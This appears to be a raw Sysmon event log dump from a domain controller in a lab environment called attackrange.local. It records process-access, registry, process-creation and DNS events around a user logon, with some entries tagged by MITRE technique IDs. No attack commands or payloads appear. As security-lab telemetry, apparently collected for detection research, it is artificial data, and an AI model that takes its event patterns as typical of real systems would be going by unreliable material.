13:58:18.321{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010279Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.321{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010278Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:18.321{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010277Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.321{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010276Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:18.321{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010275Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.321{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000010274Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
13:58:18.321{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\EventLog\System\mrxsmb\ParameterMessageFile%%SystemRoot%%\System32\kernel32.dll 10341000x800000000000000010273Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.321{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+58a7|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010272Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:18.321{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010271Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.321{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010270Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:18.321{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000010269Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:18.274{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\NTDS\Parameters\ldapserverintegrityDWORD (0x00000001) 13241300x800000000000000010268Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:18.274{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\Netlogon\Parameters\requiresignorsealDWORD (0x00000001) 13241300x800000000000000010267Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:18.274{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\LanmanServer\Parameters\requiresecuritysignatureDWORD (0x00000001) 13241300x800000000000000010266Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
13:58:18.274{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\LanmanServer\Parameters\enablesecuritysignatureDWORD (0x00000001) 13241300x800000000000000010265Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT1101SetValue2021-01-18 13:58:18.274{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Control\Lsa\nolmhashDWORD (0x00000001) 13241300x800000000000000010264Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT1060,RunKeySetValue2021-01-18 13:58:18.227{59A5CD1D-93FA-6005-F904-00000000A301}2860C:\Windows\system32\userinit.exeHKU\S-1-5-21-2311372046-1276363322-545193238-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Runonce\ctfmon.exectfmon.exe /n 10341000x800000000000000010263Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.227{59A5CD1D-8E46-6005-1600-00000000A301}15442108C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-F904-00000000A301}2860C:\Windows\system32\userinit.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010262Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:18.227{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-F904-00000000A301}2860C:\Windows\system32\userinit.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010261Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.149{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010260Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:18.149{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010259Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.149{59A5CD1D-93F6-6005-E604-00000000A301}48883504C:\Windows\system32\csrss.exe{59A5CD1D-93FA-6005-F904-00000000A301}2860C:\Windows\system32\userinit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000010258Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:18.149{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010257Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.149{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010256Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:18.149{59A5CD1D-93F6-6005-E704-00000000A301}45721160C:\Windows\system32\winlogon.exe{59A5CD1D-93FA-6005-F904-00000000A301}2860C:\Windows\system32\userinit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\winlogon.exe+15b13|C:\Windows\system32\winlogon.exe+ea76|C:\Windows\system32\winlogon.exe+b12f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000010255Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.153{59A5CD1D-93FA-6005-F904-00000000A301}2860C:\Windows\System32\userinit.exe10.0.14393.0 (rs1_release.160715-1616)Userinit Logon ApplicationMicrosoft® Windows® Operating SystemMicrosoft CorporationUSERINIT.EXEC:\Windows\system32\userinit.exeC:\Windows\system32\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492HighMD5=C1B1FFC800BE2F31EB2CF8CB40629C69,SHA256=CFC6A18FC8FE7447ECD491345A32F0F10208F114B70A0E9D1CD72F6070D5B36F,IMPHASH=BFA137B16F3492AFCA0551687B067C04{59A5CD1D-93F6-6005-E704-00000000A301}4572C:\Windows\System32\winlogon.exewinlogon.exe 10341000x800000000000000010254Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:18.133{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000010360Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.390{59A5CD1D-93FA-6005-FA04-00000000A301}2120win-dc-495.attackrange.local0fe80::16d:d52:d54:cffc;::ffff:10.0.1.14;C:\Windows\System32\taskhostw.exe 22542200x800000000000000010359Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:18.278{00000000-0000-0000-0000-000000000000}2120localhost0::1;::ffff:127.0.0.1;<unknown process> 22542200x800000000000000010358Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.426{59A5CD1D-93F9-6005-EE04-00000000A301}4120win-dc-495.attackrange.local0fe80::16d:d52:d54:cffc;::ffff:10.0.1.14;C:\Windows\System32\efsui.exe 22542200x800000000000000010357Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.305{59A5CD1D-8E56-6005-2E00-00000000A301}2464189.78.188.20.in-addr.arpa.9003-C:\Windows\sysmon64.exe 10341000x800000000000000010356Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:19.680{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010355Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:19.602{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010354Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:19.602{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010353Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 